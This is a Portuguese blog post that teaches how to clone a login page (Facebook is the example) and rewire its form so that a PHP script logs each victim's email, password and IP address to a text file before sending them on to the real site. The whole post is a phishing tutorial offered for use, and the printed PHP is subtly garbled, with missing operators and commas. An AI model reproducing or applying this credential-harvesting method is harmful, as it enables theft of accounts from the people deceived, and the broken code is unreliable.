Criando Paginas Fakes de Qualquer Site

Copiando a pagina
Primeiramente você precisa copiar a pagina original pra depois editar o código, faça isso usando CTRL + S no navegador, usando o CTRL + S o navegador não vai só salvar o código html como também os arquivos necessários pra rodar tudo normalmente, apenas copiando o código fonte pode ser que dê algum problema no design da pagina e etc, em alguns sites as imagens ficam restritas ao usuário
como é o caso do facebook, então teríamos que baixar todas as imagens direto do servidor, pode usar um programa pra automatizar isso com o wget no linux ou o HTTrack no Windows (tem versão para linux também), então, salve na área de trabalho e pronto.

Editando o código da pagina
Agora vamos ao que interessa!
Toda pagina de login precisa ter um botão que vai ser pressionado após a pessoa inserir os dados e é exatamente essa função que vamos procurar no código. Abra a index em alguma IDE ou até mesmo no bloco de notas mas recomendo que tenha uma IDE, mesmo que seja simples. 
Agora busque pelo form que traz a ação login, nesse exemplo usei a pagina do facebook:

O que nos interessa é a "action=", perceba que dentro dela existe um link, esse é o link que provavelmente verifica se os dados estão corretos e direciona pra pagina inicial do facebook, o que vamos fazer é remover esse link e colocar o nosso arquivo .php que vai pegar os dados e redirecionar a pessoa pra pagina real do facebook ou pra onde você preferir, então apague esse link e coloque login.php ou o que preferir.

Criando o arquivo
Agora vamos pegar o id dos formulários que vão ser inseridos os dados pra fazer o código, abra a index, vá em cima do formulário onde vai ser inserido o email por exemplo e clique em inspecionar elemento, veja o exemplo:

No caso pequei o ID do formulário de email e de senha e coloquei no código a baixo:

1
2
3
4
5
6
7
8
9
10
11
<?php
$usr $_POST['email']; // ID do formulário de login
$pswd $_POST['senha']; // ID do formulário de senha
$ip $_SERVER['REMOTE_ADDR'];
$all "Email: ".$usr." - Senha: ".$pswd." - IP: ".$ip."<br>";
  
$fp fopen("senhas.txt""a");
fwrite($fp$all);
fclose($fp);
header("Location: http://www.site.com"); // Redirecionamento
?>
Depois de editar tudo salve como login.php ou qualquer coisa, mas tem que ser o mesmo que colocou na action da index. Agora só upar em um servidor e pronto. Quando a pessoa digitar os dados e fazer login, vai criar um arquivo chamado senhas.txt no servidor e lá vão ficar todas as senhas.


BY:LOGINN

Nenhum comentário:

Postar um comentário

Recomendado